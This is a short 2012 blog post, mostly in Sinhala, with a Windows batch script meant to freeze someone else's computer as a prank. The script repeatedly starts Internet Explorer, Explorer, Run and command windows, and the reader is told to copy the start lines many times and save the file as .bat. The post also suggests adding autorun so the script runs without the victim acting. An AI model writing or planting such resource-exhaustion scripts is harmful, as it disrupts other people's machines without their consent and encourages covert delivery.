Pages

Monday, May 14, 2012

Computer එක Stuck කරල දාමුද?


Computer එක Stuck කරල දාමුද?


කාගේ හරි Computer එකක් Stuck කරලම දාන්න පුලුවන්
 ක්‍රමයක් තමයි මම මේ කියන්න හදන්නේමේකෙන් කාටවත් 
කරදරයක් කරන්න එපා
ඒත් පොඩි ජොලි වැඩක්,


@echo off
:A
start iexplore.exe
start run
start explorer
start dir
start command

මෙතන තියන code එකේ start කියල තියෙන 
ටික පුලුවන් තරම් Copy කරල Saveකර ගන්න,
වැඩියෙන් දැම්මොත්ඉක්මනින් Stuck වෙයි හේහේ

Ex-:

@echo off
:A
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command

දැන් තියෙන්නේ මේක Save කරන්න Save as ගිහින් 
ඕක කැමති  නමක් දීලා Save කරන්න පුලුවන්
ඊට පිටිපස්සෙන් තියෙන්නේ File එකේ extension එක
මතක් කරල ඔයාල දුන්න නම අවසානෙට 
මෙහෙම Type කරන්න.  .bat

ඔන්න වැඩේ හරි දැන්,

මේක test කරල බලන්න ඕනෙනම් code වැඩිය 
දාන්නේ නැතුව test කරල බලන්න. මුකුත් ප්‍රශ්ණයක්
 වෙන්නේ නැ

මේකෙන් වැඩියෙන් දැම්මොත් අනිවර්යෙන් Stuck වෙනවමයිහේ හේඑච්චරයි,මේකටත් Auto run එකක් ලියල දැම්මනම් ගොඩේ ගොඩ
~~Lakindu Hansaka~~

No comments:

Post a Comment